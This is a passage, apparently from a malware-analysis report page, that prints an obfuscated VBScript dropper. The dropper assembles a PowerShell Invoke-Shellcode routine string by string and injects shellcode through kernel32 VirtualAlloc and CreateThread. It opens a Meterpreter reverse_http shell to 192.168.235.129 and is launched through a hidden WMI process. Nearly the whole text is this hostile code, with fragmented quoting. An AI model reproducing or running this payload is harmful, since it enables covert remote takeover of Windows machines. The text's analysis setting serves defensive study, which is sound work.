e = e + " [System.Runtime.InteropServices.Marshal]::GetDele"
e = e + "gateForFunctionPointer($CloseHandleAddr, $CloseHan"
e = e + "dleDelegate)"
if ( $Force -or $psCmdlet.Sh"
e = e + "ouldContinue( 'Do you wish to carry out your evil "
e = e + "plans?',"
"Injecting shellcode in"
e = e + "jecting into $((Get-Process -Id $ProcessId).Proces"
e = e + "sName) ($ProcessId)!" ) )
{
"
e = e + "Inject-RemoteShellcode $ProcessId"
}
"
e = e + "}"
Else
{
$VirtualAllocAddr = Ge"
e = e + "t-ProcAddress kernel32.dll VirtualAlloc"
$"
e = e + "VirtualAllocDelegate = Get-DelegateType @([IntPtr]"
e = e + ", [UInt32], [UInt32], [UInt32]) ([IntPtr])"
"
e = e + " $VirtualAlloc = [System.Runtime.InteropServices."
e = e + "Marshal]::GetDelegateForFunctionPointer($VirtualAl"
e = e + "locAddr, $VirtualAllocDelegate)"
$VirtualF"
e = e + "reeAddr = Get-ProcAddress kernel32.dll VirtualFree"
e = e + ""
$VirtualFreeDelegate = Get-DelegateType "
e = e + "@([IntPtr], [Uint32], [UInt32]) ([Bool])"
"
e = e + "$VirtualFree = [System.Runtime.InteropServices.Mar"
e = e + "shal]::GetDelegateForFunctionPointer($VirtualFreeA"
e = e + "ddr, $VirtualFreeDelegate)"
$CreateThreadA"
e = e + "ddr = Get-ProcAddress kernel32.dll CreateThread"
"
e = e + " $CreateThreadDelegate = Get-DelegateType @("
e = e + "[IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], "
e = e + "[IntPtr]) ([IntPtr])"
$CreateThread = [Sys"
e = e + "tem.Runtime.InteropServices.Marshal]::GetDelegateF"
e = e + "orFunctionPointer($CreateThreadAddr, $CreateThread"
e = e + "Delegate)"
$WaitForSingleObjectAddr = Get-"
e = e + "ProcAddress kernel32.dll WaitForSingleObject"
"
e = e + " $WaitForSingleObjectDelegate = Get-DelegateTyp"
e = e + "e @([IntPtr], [Int32]) ([Int])"
$WaitForSi"
e = e + "ngleObject = [System.Runtime.InteropServices.Marsh"
e = e + "al]::GetDelegateForFunctionPointer($WaitForSingleO"
e = e + "bjectAddr, $WaitForSingleObjectDelegate)"
"
e = e + "if ( $Force -or $psCmdlet.ShouldContinue( 'Do you "
e = e + "wish to carry out your evil plans?',"
"
e = e + " "Injecting shellcode into the running PowerSh"
e = e + "ell process!" ) )
{
Inject-L"
e = e + "ocalShellcode"
}
}
}
Invoke-Shell"
e = e + "code -Payload windows/meterpreter/reverse_http -Lh"
e = e + "ost 192.168.235.129 -Lport 80 -Force"
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
objProcess.Create e, Null, objConfig, intProcessID
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.